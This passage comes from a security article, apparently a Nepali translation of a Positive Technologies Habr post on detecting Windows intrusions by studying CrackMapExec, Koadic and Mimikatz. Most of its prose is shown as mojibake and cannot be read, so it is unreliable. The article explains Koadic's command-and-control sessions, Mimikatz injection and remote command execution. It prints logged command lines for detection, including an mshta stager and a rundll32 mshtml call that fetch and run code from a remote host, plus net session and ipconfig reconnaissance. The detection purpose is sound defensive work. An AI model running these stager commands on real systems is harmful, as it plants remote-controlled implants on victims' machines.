рд╕рдорд╛рд╡реЗрд╢ рд╣реБрдиреЗрдЫред

рдкреНрд░рддреНрдпреЗрдХ CME рдореЛрдбреНрдпреБрд▓рдХреЛ рдЖрдлреНрдиреИ рдХрд▓рд╛рдХреГрддрд┐рд╣рд░реВ рдерд┐рдП, рдпреЛ рд╡рд┐рд╢рд┐рд╖реНрдЯ WQL рдкреНрд░рд╢реНрдирд╣рд░реВ рд╣реЛрд╕реН рд╡рд╛ LDAP рд░ SMB рдорд╛ рдЕрд╕реНрдкрд╖реНрдЯрддрд╛ рд░ рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб-рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЧрддрд┐рд╡рд┐рдзрд┐рдХреЛ рд╕рд╛рде рдХрд╛рд░реНрдп рддрд╛рд▓рд┐рдХрд╛рдорд╛ рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рдкреНрд░рдХрд╛рд░рдХреЛ рдХрд╛рд░реНрдпрдХреЛ рд╕рд┐рд░реНрдЬрдирд╛ред

KOADIC

Koadic рдХреЛ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╡рд┐рд╢реЗрд╖рддрд╛ Windows рдорд╛ рдирд┐рд░реНрдорд┐рдд JavaScript рд░ VBScript рд╡реНрдпрд╛рдЦреНрдпрд╛рдХрд░реНрддрд╛рд╣рд░реВрдХреЛ рдкреНрд░рдпреЛрдЧ рд╣реЛред рдпрд╕ рдЕрд░реНрдердорд╛, рдпрд╕рд▓реЗ рд▓реНрдпрд╛рдиреНрдб рдЕрдл рдж рд▓рд┐рднрд┐рдЩ рдЯреНрд░реЗрдиреНрдбрд▓рд╛рдИ рдкрдЫреНрдпрд╛рдЙрдБрдЫ - рддреНрдпреЛ рд╣реЛ, рдпрд╕рдорд╛ рдХреБрдиреИ рдмрд╛рд╣реНрдп рдирд┐рд░реНрднрд░рддрд╛ рдЫреИрди рд░ рдорд╛рдирдХ рд╡рд┐рдиреНрдбреЛрдЬ рдЙрдкрдХрд░рдгрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рдпреЛ рдкреВрд░реНрдг рдХрдорд╛рдгреНрдб рдПрдиреНрдб рдХрдиреНрдЯреНрд░реЛрд▓ (CnC) рдХреЛ рд▓рд╛рдЧрд┐ рдПрдХ рдЙрдкрдХрд░рдг рд╣реЛ, рдХрд┐рдирдХрд┐ рд╕рдВрдХреНрд░рдордг рдкрдЫрд┐ рдореЗрд╕рд┐рдирдорд╛ "рдЗрдореНрдкреНрд▓рд╛рдиреНрдЯ" рд╕реНрдерд╛рдкрдирд╛ рдЧрд░рд┐рдиреНрдЫ, рдпрд╕рд▓рд╛рдИ рдирд┐рдпрдиреНрддреНрд░рдг рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдпрд╕реНрддреЛ рдореЗрд╕рд┐рди, рдХреЛрдЖрдбрд┐рдХ рд╢рдмреНрджрд╛рд╡рд▓реАрдорд╛, "рдЬреЛрдореНрдмреА" рднрдирд┐рдиреНрдЫред рдпрджрд┐ рдкреАрдбрд┐рддрдХреЛ рдкрдХреНрд╖рдорд╛ рдкреВрд░реНрдг рд╕рдЮреНрдЪрд╛рд▓рдирдХреЛ рд▓рд╛рдЧрд┐ рдЕрдкрд░реНрдпрд╛рдкреНрдд рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рдЫрдиреН рднрдиреЗ, Koadic рд╕рдБрдЧ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ рдирд┐рдпрдиреНрддреНрд░рдг рдмрд╛рдЗрдкрд╛рд╕ (UAC рдмрд╛рдИрдкрд╛рд╕) рдкреНрд░рд╡рд┐рдзрд┐рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдЙрдард╛рдЙрдиреЗ рдХреНрд╖рдорддрд╛ рдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 10. рдХреЛрдЖрдбрд┐рдХ рд╢реЗрд▓

рдкреАрдбрд┐рддрд▓реЗ рдЖрджреЗрд╢ рд░ рдирд┐рдпрдиреНрддреНрд░рдг рд╕рд░реНрднрд░рд╕рдБрдЧ рд╕рдЮреНрдЪрд╛рд░ рд╕реБрд░реБ рдЧрд░реНрдиреБрдкрд░реНрдЫред рдпреЛ рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдЙрд╕рд▓реЗ рдкрд╣рд┐рд▓реЗ рддрдпрд╛рд░ рдЧрд░рд┐рдПрдХреЛ URI рд▓рд╛рдИ рд╕рдореНрдкрд░реНрдХ рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдЫ рд░ рд╕реНрдЯреЗрдЬрд░рд╣рд░реВ рдордзреНрдпреЗ рдПрдХ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдореБрдЦреНрдп рдХреЛрдЖрдбрд┐рдХ рд╢рд░реАрд░ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдЫред рдЪрд┐рддреНрд░рдорд╛ред рдЪрд┐рддреНрд░ 11 рд▓реЗ mshta рд╕реНрдЯреЗрдЬрд░рдХреЛ рд▓рд╛рдЧрд┐ рдЙрджрд╛рд╣рд░рдг рджреЗрдЦрд╛рдЙрдБрдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 11. CnC рд╕рд░реНрднрд░рдХреЛ рд╕рд╛рде рд╕рддреНрд░ рд╕реБрд░реБ рдЧрд░реНрджреИ

рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЪрд░ WS рдХреЛ рдЖрдзрд╛рд░рдорд╛, рдпреЛ рд╕реНрдкрд╖реНрдЯ рд╣реБрдиреНрдЫ рдХрд┐ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди WScript.Shell рдорд╛рд░реНрдлрдд рд╣реБрдиреНрдЫ, рд░ рдЪрд░ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE рд╣рд╛рд▓рдХреЛ рд╕рддреНрд░рдХреЛ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдореБрдЦреНрдп рдЬрд╛рдирдХрд╛рд░реА рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫред рдпреЛ CnC рд╕рд░реНрднрд░рд╕рдБрдЧ HTTP рдЬрдбрд╛рдирдорд╛ рдкрд╣рд┐рд▓реЛ рдЕрдиреБрд░реЛрдз-рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбреА рд╣реЛред рддреНрдпрд╕рдкрдЫрд┐рдХрд╛ рдЕрдиреБрд░реЛрдзрд╣рд░реВ рд╕реАрдзреИ рднрдирд┐рдиреНрдЫ рдореЛрдбреНрдпреБрд▓ (рдЗрдореНрдкреНрд▓рд╛рдиреНрдЯ) рдХреЛ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛рд╕рдБрдЧ рд╕рдореНрдмрдиреНрдзрд┐рдд рдЫрдиреНред рд╕рдмреИ Koadic рдореЛрдбреНрдпреБрд▓рд╣рд░реВ CnC рд╕рдБрдЧ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░рдХреЛ рд╕рд╛рде рдорд╛рддреНрд░ рдХрд╛рдо рдЧрд░реНрдЫрдиреНред

Mimikatz

рдЬрд╕рд░реА CME рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдбрд╕рдБрдЧ рдХрд╛рдо рдЧрд░реНрджрдЫ, Koadic рд╕рдБрдЧ Mimikatz рд╕рдБрдЧ рдЫреБрдЯреНрдЯреИ рдХрд╛рд░реНрдпрдХреНрд░рдордХреЛ рд░реВрдкрдорд╛ рдХрд╛рдо рдЧрд░реНрджрдЫ рд░ рдпрд╕рд▓рд╛рдИ рд╕реБрд░реБ рдЧрд░реНрдиреЗ рдзреЗрд░реИ рддрд░рд┐рдХрд╛рд╣рд░реВ рдЫрдиреНред рддрд▓ Mimikatz рдЗрдореНрдкреНрд▓рд╛рдиреНрдЯ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐ рдЕрдиреБрд░реЛрдз-рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбреА рдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 12. Mimikatz Koadic рдорд╛ рд╕реНрдерд╛рдирд╛рдиреНрддрд░рдг рдЧрд░реНрдиреБрд╣реЛрд╕реН

рддрдкрд╛рдИрдВрд▓реЗ рдЕрдиреБрд░реЛрдзрдорд╛ URI рдврд╛рдБрдЪрд╛ рдХрд╕рд░реА рдкрд░рд┐рд╡рд░реНрддрди рднрдПрдХреЛ рдЫ рднрдиреЗрд░ рд╣реЗрд░реНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫред рдпрд╕рд▓реЗ рдЕрдм csrf рдЪрд░рдХреЛ рд▓рд╛рдЧрд┐ рдорд╛рди рд╕рдорд╛рд╡реЗрд╢ рдЧрд░реНрджрдЫ, рдЬреБрди рдЪрдпрди рдЧрд░рд┐рдПрдХреЛ рдореЛрдбреНрдпреБрд▓рдХреЛ рд▓рд╛рдЧрд┐ рдЬрд┐рдореНрдореЗрд╡рд╛рд░ рдЫред рдЙрдирдХреЛ рдирд╛рдордорд╛ рдзреНрдпрд╛рди рдирджрд┐рдиреБрд╣реЛрд╕реН; рд╣рд╛рдореА рд╕рдмреИрд▓рд╛рдИ рдерд╛рд╣рд╛ рдЫ рдХрд┐ CSRF рд▓рд╛рдИ рд╕рд╛рдорд╛рдиреНрдпрддрдпрд╛ рдлрд░рдХ рддрд░рд┐рдХрд╛рд▓реЗ рдмреБрдЭрд┐рдиреНрдЫред рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ Koadic рдХреЛ рдПрдЙрдЯреИ рдореБрдЦреНрдп рд╢рд░реАрд░ рдерд┐рдпреЛ, рдЬрд╕рдорд╛ Mimikatz рд╕рдореНрдмрдиреНрдзрд┐рдд рдХреЛрдб рдердкрд┐рдПрдХреЛ рдерд┐рдпреЛред рдпреЛ рдПрдХрджрдо рдареВрд▓реЛ рдЫ, рддреНрдпрд╕реИрд▓реЗ рдореБрдЦреНрдп рдмрд┐рдиреНрджреБрд╣рд░реВ рд╣реЗрд░реМрдВред рдпрд╣рд╛рдБ рд╣рд╛рдореАрд╕рдБрдЧ рдмреЗрд╕64 рдорд╛ рдПрдиреНрдХреЛрдб рдЧрд░рд┐рдПрдХреЛ Mimikatz рдкреБрд╕реНрддрдХрд╛рд▓рдп рдЫ, рдПрдХ рдХреНрд░рдордмрджреНрдз .NET рдХреНрд▓рд╛рд╕ рдЬрд╕рд▓реЗ рдпрд╕рд▓рд╛рдИ рдЗрдиреНрдЬреЗрдХреНрдЯ рдЧрд░реНрдиреЗрдЫ, рд░ Mimikatz рд╕реБрд░реБ рдЧрд░реНрди рддрд░реНрдХрд╣рд░реВ рдЫрдиреНред рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдкрд░рд┐рдгрд╛рдо рд╕реНрдкрд╖реНрдЯ рдкрд╛рдардорд╛ рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдкреНрд░рд╕рд╛рд░рд┐рдд рд╣реБрдиреНрдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 13. рд░рд┐рдореЛрдЯ рдореЗрд╕рд┐рдирдорд╛ Mimikatz рдЪрд▓рд╛рдЙрдиреЗ рдкрд░рд┐рдгрд╛рдо

Exec_cmd

Koadic рдорд╛ рдореЛрдбреНрдпреБрд▓рд╣рд░реВ рдкрдирд┐ рдЫрдиреН рдЬрд╕рд▓реЗ рдЯрд╛рдврд╛рдмрд╛рдЯ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рд╕рдХреНрдЫред рдпрд╣рд╛рдБ рд╣рд╛рдореА рдЙрд╣реА URI рдЬреЗрдиреЗрд░реЗрд╢рди рд╡рд┐рдзрд┐ рд░ рдкрд░рд┐рдЪрд┐рдд sid рд░ csrf рдЪрд░рд╣рд░реВ рджреЗрдЦреНрдиреЗрдЫреМрдВред exec_cmd рдореЛрдбреНрдпреБрд▓рдХреЛ рдЕрд╡рд╕реНрдерд╛рдорд╛, рдХреЛрдб рд╢рд░реАрд░рдорд╛ рдердкрд┐рдПрдХреЛ рдЫ рдЬреБрди рд╢реЗрд▓ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рд╕рдХреНрд╖рдо рдЫред CnC рд╕рд░реНрднрд░рдХреЛ HTTP рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛рдорд╛ рд╕рдорд╛рд╡реЗрд╢ рдЧрд░рд┐рдПрдХреЛ рдпрд╕реНрддреЛ рдХреЛрдб рддрд▓ рджреЗрдЦрд╛рдЗрдПрдХреЛ рдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 14. рдкреНрд░рддреНрдпрд╛рд░реЛрдкрдг рдХреЛрдб exec_cmd

рдкрд░рд┐рдЪрд┐рдд WS рд╡рд┐рд╢реЗрд╖рддрд╛ рднрдПрдХреЛ GAWTUUGCFI рдЪрд░ рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рд▓рд╛рдЧрд┐ рдЖрд╡рд╢реНрдпрдХ рдЫред рдпрд╕рдХреЛ рдорджреНрджрддрд▓реЗ, рдкреНрд░рддреНрдпрд╛рд░реЛрдкрдгрд▓реЗ рд╢реЗрд▓рд▓рд╛рдИ рдХрд▓ рдЧрд░реНрджрдЫ, рдХреЛрдбрдХрд╛ рджреБрдИ рд╢рд╛рдЦрд╛рд╣рд░реВ рдкреНрд░рд╢реЛрдзрди рдЧрд░реНрджрдЫ - shell.exec рдЖрдЙрдЯрдкреБрдЯ рдбрд╛рдЯрд╛ рд╕реНрдЯреНрд░рд┐рдо рд░ shell.run рдлрд┐рд░реНрддрд╛ рдирдЧрд░реА рдлрд┐рд░реНрддрд╛ред

Koadic рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рдЙрдкрдХрд░рдг рд╣реЛрдЗрди, рддрд░ рдпрд╕рдХреЛ рдЖрдлреНрдиреИ рдХрд▓рд╛рдХреГрддрд┐рд╣рд░реВ рдЫрдиреН рдЬрд╕рджреНрд╡рд╛рд░рд╛ рдпреЛ рд╡реИрдз рдЯреНрд░рд╛рдлрд┐рдХрдорд╛ рдлреЗрд▓рд╛ рдкрд╛рд░реНрди рд╕рдХрд┐рдиреНрдЫ:

  • HTTP рдЕрдиреБрд░реЛрдзрд╣рд░реВрдХреЛ рд╡рд┐рд╢реЗрд╖ рдЧрдарди,
  • winHttpRequests API рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░,
  • ActiveXObject рдорд╛рд░реНрдлрдд WScript.Shell рд╡рд╕реНрддреБ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ,
  • рдареВрд▓реЛ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдирд┐рдХрд╛рдпред

рдкреНрд░рд╛рд░рдореНрднрд┐рдХ рдЬрдбрд╛рди рд╕реНрдЯреЗрдЬрд░ рджреНрд╡рд╛рд░рд╛ рдкреНрд░рд╛рд░рдореНрдн рдЧрд░рд┐рдПрдХреЛ рдЫ, рддреНрдпрд╕реИрд▓реЗ рд╡рд┐рдиреНрдбреЛрдЬ рдШрдЯрдирд╛рд╣рд░реВ рдорд╛рд░реНрдлрдд рдпрд╕рдХреЛ рдЧрддрд┐рд╡рд┐рдзрд┐ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрди рд╕рдореНрднрд╡ рдЫред mshta рдХреЛ рд▓рд╛рдЧрд┐, рдпреЛ рдШрдЯрдирд╛ 4688 рд╣реЛ, рдЬрд╕рд▓реЗ рд╕реБрд░реБ рд╡рд┐рд╢реЗрд╖рддрд╛рдХреЛ рд╕рд╛рде рдкреНрд░рдХреНрд░рд┐рдпрд╛рдХреЛ рд╕рд┐рд░реНрдЬрдирд╛рд▓рд╛рдИ рд╕рдВрдХреЗрдд рдЧрд░реНрджрдЫ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

рдЬрдм Koadic рдЪрд▓рд┐рд░рд╣реЗрдХреЛ рдЫ, рддрдкрд╛рдИрд▓реЗ рдЕрдиреНрдп 4688 рдШрдЯрдирд╛рд╣рд░реВ рджреЗрдЦреНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ рд╡рд┐рд╢реЗрд╖рддрд╛рд╣рд░реВ рдЬреБрди рдпрд╕рд▓рд╛рдИ рдкреВрд░реНрдг рд░реВрдкрдорд╛ рд╡рд┐рд╢реЗрд╖рддрд╛ рдЧрд░реНрджрдЫ:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

рдирд┐рд╖реНрдХрд░реНрд╖

рдЬрдЧреНрдЧрд╛ рдмрд╛рд╣рд┐рд░ рдмрд╕реНрдиреЗ рдкреНрд░рд╡реГрддреНрддрд┐ рдЕрдкрд░рд╛рдзреАрд╣рд░реВрдорд╛рдЭ рд▓реЛрдХрдкреНрд░рд┐рдп рд╣реБрдБрджреИ рдЧрдПрдХреЛ рдЫред рддрд┐рдиреАрд╣рд░реВрд▓реЗ рдЖрдлреНрдиреЛ рдЖрд╡рд╢реНрдпрдХрддрд╛рдХреЛ рд▓рд╛рдЧрд┐ Windows рдорд╛ рдирд┐рд░реНрдорд┐рдд рдЙрдкрдХрд░рдгрд╣рд░реВ рд░ рд╕рдВрдпрдиреНрддреНрд░рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫрдиреНред рд╣рд╛рдореАрд▓реЗ рд▓реЛрдХрдкреНрд░рд┐рдп рдЙрдкрдХрд░рдгрд╣рд░реВ Koadic, CrackMapExec рд░ Impacket рдпрд╕ рд╕рд┐рджреНрдзрд╛рдиреНрддрд▓рд╛рдИ рдЕрдиреБрд╕рд░рдг рдЧрд░реНрджреИ APT рд░рд┐рдкреЛрд░реНрдЯрд╣рд░реВрдорд╛ рдмрдвреНрджреЛ рд░реВрдкрдорд╛ рджреЗрдЦрд╛ рдкрд░рд┐рд░рд╣реЗрдХрд╛ рдЫреМрдВред рдпреА рдЙрдкрдХрд░рдгрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ GitHub рдорд╛ рдлреЛрд░реНрдХрд╣рд░реВрдХреЛ рд╕рдВрдЦреНрдпрд╛ рдкрдирд┐ рдмрдвреНрджреИ рдЧрдПрдХреЛ рдЫ, рд░ рдирдпрд╛рдБрд╣рд░реВ рджреЗрдЦрд╛ рдкрд░реНрджреИрдЫрдиреН (рддреНрдпрд╣рд╛рдБ рдкрд╣рд┐рд▓реЗ рдиреИ рддреА рдордзреНрдпреЗ рд╣рдЬрд╛рд░реМрдВ рдЫрдиреН)ред рдкреНрд░рд╡реГрддрд┐ рдпрд╕рдХреЛ рд╕рд░рд▓рддрд╛рдХреЛ рдХрд╛рд░рдгрд▓реЗ рд▓реЛрдХрдкреНрд░рд┐рдпрддрд╛ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрджреИрдЫ: рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓рд╛рдИ рддреЗрд╕реНрд░реЛ-рдкрдХреНрд╖ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЖрд╡рд╢реНрдпрдХ рдкрд░реНрджреИрди; рддрд┐рдиреАрд╣рд░реВ рдкрд╣рд┐рд▓реЗ рдиреИ рдкреАрдбрд┐рддрд╣рд░реВрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рдЫрдиреН рд░ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдпрд╣рд░реВ рдмрд╛рдЗрдкрд╛рд╕ рдЧрд░реНрди рдорджреНрджрдд рдЧрд░реНрджрдЫред рд╣рд╛рдореА рдиреЗрдЯрд╡рд░реНрдХ рд╕рдВрдЪрд╛рд░рдХреЛ рдЕрдзреНрдпрдпрдирдорд╛ рдзреНрдпрд╛рди рдХреЗрдиреНрджреНрд░рд┐рдд рдЧрд░реНрдЫреМрдВ: рдорд╛рдерд┐ рд╡рд░реНрдгрди рдЧрд░рд┐рдПрдХреЛ рдкреНрд░рддреНрдпреЗрдХ рдЙрдкрдХрд░рдгрд▓реЗ рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░рд╛рдлрд┐рдХрдорд╛ рдЖрдлреНрдиреИ рдЯреНрд░реЗрд╕рд╣рд░реВ рдЫреЛрдбреНрдЫ; рддрд┐рдиреАрд╣рд░реВрдХреЛ рд╡рд┐рд╕реНрддреГрдд рдЕрдзреНрдпрдпрдирд▓реЗ рд╣рд╛рдореАрд▓рд╛рдИ рд╣рд╛рдореНрд░реЛ рдЙрддреНрдкрд╛рджрди рд╕рд┐рдХрд╛рдЙрди рдЕрдиреБрдорддрд┐ рджрд┐рдпреЛ рдкреАрдЯреА рдиреЗрдЯрд╡рд░реНрдХ рдЖрдХреНрд░рдордг рдЦреЛрдЬ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реН, рдЬрд╕рд▓реЗ рдЕрдиреНрддрддрдГ рддрд┐рдиреАрд╣рд░реВрдорд╛ рд╕рдВрд▓рдЧреНрди рд╕рд╛рдЗрдмрд░ рдШрдЯрдирд╛рд╣рд░реВрдХреЛ рд╕рдореНрдкреВрд░реНрдг рд╢реНрд░реГрдВрдЦрд▓рд╛рдХреЛ рдЕрдиреБрд╕рдиреНрдзрд╛рди рдЧрд░реНрди рдорджреНрджрдд рдЧрд░реНрджрдЫред

рд▓реЗрдЦрдХ:

  • рдПрдиреНрдЯреЛрди рдЯреНрдпреБрд░рд┐рди, рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реЗрд╡рд╛ рд╡рд┐рднрд╛рдЧ рдкреНрд░рдореБрдЦ, рдкреАрдЯреА рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдиреНрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рдЯреЗрдХреНрдиреЛрд▓реЛрдЬреАрд╣рд░реВ
  • Egor Podmokov, рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ, PT рд╡рд┐рд╢реЗрд╖рдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдиреНрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рдЯреЗрдХреНрдиреЛрд▓реЛрдЬреА

рд╕реНрд░реЛрдд: www.habr.com

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдердкреНрди